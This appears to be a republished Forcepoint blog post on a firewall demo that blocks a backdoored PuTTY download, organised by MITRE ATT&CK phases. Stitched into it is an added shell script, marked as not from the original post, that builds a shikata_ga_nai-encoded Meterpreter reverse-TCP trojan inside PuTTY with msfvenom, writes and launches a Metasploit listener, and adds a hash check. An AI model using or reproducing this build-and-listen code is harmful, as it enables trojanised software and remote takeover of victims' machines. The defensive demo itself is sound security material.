Forcepoint NGFW MITRE ATT&CK simulation

Intrusion Prevention with Forcepoint NGFW

I used the MITRE ATT&CK framework to divide the simulation into phases.

In this scenario, an admin researches an issue and finds a potential solution on a forum. The solution provides a download link for PuTTY. Unfortunately, the link points to a malicious server that serves a backdoored version of PuTTY.

The reverse TCP backdoor was added with msfvenom from the Metasploit framework using the shikata_ga_nai encoder, a polymorphic encoder chosen because its output is typically difficult to catch with static signatures. The attacker has a listener on his machine waiting for the executable to open a reverse TCP connection back home.
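As an added example (not code from the original post or from Forcepoint), the script below shows the attacker-side setup the paragraph describes: the msfvenom call that injects an x86 Meterpreter reverse TCP stager into a clean PuTTY template and passes it through x86/shikata_ga_nai, the Metasploit resource script for the waiting listener, and, on the other side, the integrity check that catches the swapped download regardless of how well the payload is encoded. The attacker address, port, template path, output name, encoder iteration count and the vendor hash used in the check are all assumptions for illustration, not values from the post.

```shell
#!/bin/sh
# Added example (not the post's or Forcepoint's code): attacker build and
# handler for the scenario, plus the endpoint-side download check.
# All values below are placeholders (assumptions), not values from the post.

LHOST="${LHOST:-192.0.2.10}"        # attacker listener address (TEST-NET-1, assumed)
LPORT="${LPORT:-4444}"              # listener port (assumed)
TEMPLATE="${TEMPLATE:-putty.exe}"   # clean 32-bit PuTTY used as template (assumed path)
OUT="${OUT:-putty_backdoored.exe}"  # trojanised output (assumed name)
ITER="${ITER:-5}"                   # shikata_ga_nai passes (assumed count)

# msfvenom line: Meterpreter reverse TCP stager injected into the PuTTY
# template (-x) while keeping PuTTY's own code running (-k), encoded with
# x86/shikata_ga_nai (-e, -i). The template must be a 32-bit PE for an x86
# payload; a 64-bit PuTTY build needs windows/x64/meterpreter/reverse_tcp.
msfvenom_cmd() {
  printf 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i %s -x %s -k -f exe -o %s' \
    "$LHOST" "$LPORT" "$ITER" "$TEMPLATE" "$OUT"
}

# Resource script for the listener that waits for the reverse connection
# (run with: msfconsole -q -r handler.rc).
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j
EOF
}

# Endpoint-side check: SHA-256 of a file, with GNU sha256sum or BSD shasum.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Compare a downloaded file with the digest the vendor publishes.
# Returns 0 on match, 1 otherwise. Template injection changes bytes in the
# binary, so the trojanised copy can never match the published value,
# however well the payload itself is encoded.
verify_download() {
  file="$1"; expected="$2"
  actual="$(sha256_of "$file")"
  if [ "$actual" = "$expected" ]; then
    echo "OK: $file matches published SHA-256"
    return 0
  fi
  echo "MISMATCH: $file has $actual, expected $expected" >&2
  return 1
}

# Only build and listen when Metasploit and a template are actually present;
# otherwise print the commands so the reader can see what would run.
if command -v msfvenom >/dev/null 2>&1 && [ -f "$TEMPLATE" ]; then
  eval "$(msfvenom_cmd)"
  handler_rc > handler.rc
  msfconsole -q -r handler.rc
else
  echo "# would run:"; msfvenom_cmd; echo
  echo "# handler.rc:"; handler_rc
fi
```

The point of keeping the check next to the build is the contrast: the encoder only buys evasion against content inspection of the payload, while the hash comparison (or a check of the vendor's Authenticode signature) fails on any modified binary, which is why File Filtering and File reputation on the NGFW complement DPI rather than duplicate it.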
The phases and the defense mechanisms shown in each are:

1. Initial Access

  •  URL Filtering
  •  Deep Packet Inspection
  •  File Filtering (Sandbox)

2. Execution

  •  ECA Whitelisting
  •  Snort Integration

3. Exfiltration

  •  DLP Integration

Here’s my kill chain video demo:

Of note: to create a seamless and smooth demo, I silenced multiple defense mechanisms during deep packet inspection. A partial list of items that were not displayed in the video:

  • IP Address lists
  • Packet validation (IP & TCP)
  • Correlation situations
  • File reputation
  • Anti malware
  • User based restrictions
  • TLS Decryption
  • Sidewinder proxy

This post was first published on the Forcepoint website by Jenny Heino. You can view it by clicking here